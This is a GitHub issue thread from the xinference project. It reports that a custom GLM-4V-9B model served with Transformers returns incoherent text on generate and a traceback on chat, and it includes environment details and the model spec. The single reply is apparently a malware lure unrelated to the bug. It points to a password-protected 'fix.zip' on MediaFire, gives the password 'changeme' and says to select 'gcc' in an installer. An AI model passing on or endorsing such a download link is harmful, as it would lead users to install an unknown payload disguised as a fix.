### ISSUE TITLE
xinference GLM4v transformer推理generate或者chat做无效推理

### ISSUE THREAD

**Issue by 2500035435** [xorbitsai/inference#2187]
### System Info / 系統信息

```
transformers--4.43.4
torch--2.4.0
python--3.11.9
```

### Running Xinference with Docker? / 是否使用 Docker 运行 Xinfernece？

- [X] docker / docker
- [X] pip install / 通过 pip install 安装
- [X] installation from source / 从源码安装

### Version info / 版本信息

`xinference-- 0.14.3`

### The command used to start Xinference / 用以启动 xinference 的命令

```
{
    "version": 1,
    "context_length": 8192,
    "model_name": "custom-glm4v",
    "model_lang": [
      "en",
      "zh"
    ],
    "model_ability": [
      "chat",
      "tools",
      "vision"
    ],
    "model_family": "other",
    "model_specs": [
      {
        "model_format": "pytorch",
        "model_size_in_billions": 9,
        "quantizations": [
          "4-bit",
          "8-bit",
          "none"
        ],
        "model_id": "glm-4v-9b",
        "model_uri": "/root/xxx/models/glm-4v-9b"
      }
    ]
  }
```

> xinference launch --model-name custom-glm4v --model-format pytorch --model-engine Transformers

> xinference generate --model-uid custom-glm4v
> or
> xinference chat --model-uid custom-glm4v

### Reproduction / 复现过程

>` xinference generate --model-uid custom-glm4v`

> 
> Prompt: 你好
> Completion: 你好,而且如果被抽中暑天热泵体位处死机具是因热泵无法正常使用时间过热源和热交换器为低，那么就比汽轮与外界传不致冷凝器的压力过高的话就会发生故障会发回输人高也得不到及时排除，会造成制冷效果差,就会停止运行电流增大，造成水温变低，系统工作不稳定。制冷效率下降,可能导致空调就不能在制冷剂不制冷效降低制冷剂压力降下压也会使空调压缩机停机不能正压，导致压缩机的效率降低，因此，严重还会引起制冷量降低，可能无法制冰堵车泵无法进行制冷性能下降,后果不堪,甚至损坏。
> 
> 空调制冷,也会影响空调压缩系绶负荷增加电瓶，出现。所以建议将不运转。
> -。 
> 
> 压缩机等故。如果温度下降
> 
> 检查是否有问题会导致高温报警，所以一定要及时更换或更坏

>` xinference chat --model-uid custom-glm4v`报错
```
User: 你好
Assistant: Traceback (most recent call last):
  File "/root/anaconda3/envs/Xinference_conda/bin/xinference", line 8, in <module>
    sys.exit(cli())
             ^^^^^
  File "/root/anaconda3/envs/Xinference_conda/lib/python3.11/site-packages/click/core.py", line 1157, in __call__
    return self.main(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/anaconda3/envs/Xinference_conda/lib/python3.11/site-packages/click/core.py", line 1078, in main
    rv = self.invoke(ctx)
         ^^^^^^^^^^^^^^^^
  File "/root/anaconda3/envs/Xinference_conda/lib/python3.11/site-packages/click/core.py", line 1688, in invoke
    return _process_result(sub_ctx.command.invoke(sub_ctx))
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/anaconda3/envs/Xinference_conda/lib/python3.11/site-packages/click/core.py", line 1434, in invoke
    return ctx.invoke(self.callback, **ctx.params)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/anaconda3/envs/Xinference_conda/lib/python3.11/site-packages/click/core.py", line 783, in invoke
    return __callback(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/anaconda3/envs/Xinference_conda/lib/python3.11/site-packages/xinference/deploy/cmdline.py", line 1262, in model_chat
    loop.run_until_complete(task)
  File "/root/anaconda3/envs/Xinference_conda/lib/python3.11/asyncio/base_events.py", line 654, in run_until_complete
    return future.result()
           ^^^^^^^^^^^^^^^
  File "/root/anaconda3/envs/Xinference_conda/lib/python3.11/site-packages/xinference/deploy/cmdline.py", line 1233, in chat_internal
    for chunk in model.chat(
  File "/root/anaconda3/envs/Xinference_conda/lib/python3.11/site-packages/xinference/client/common.py", line 51, in streaming_response_iterator
    raise Exception(str(error))
Exception: [address=0.0.0.0:43533, pid=1456188] 
```

### Expected behavior / 期待表现

能够正常推理

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
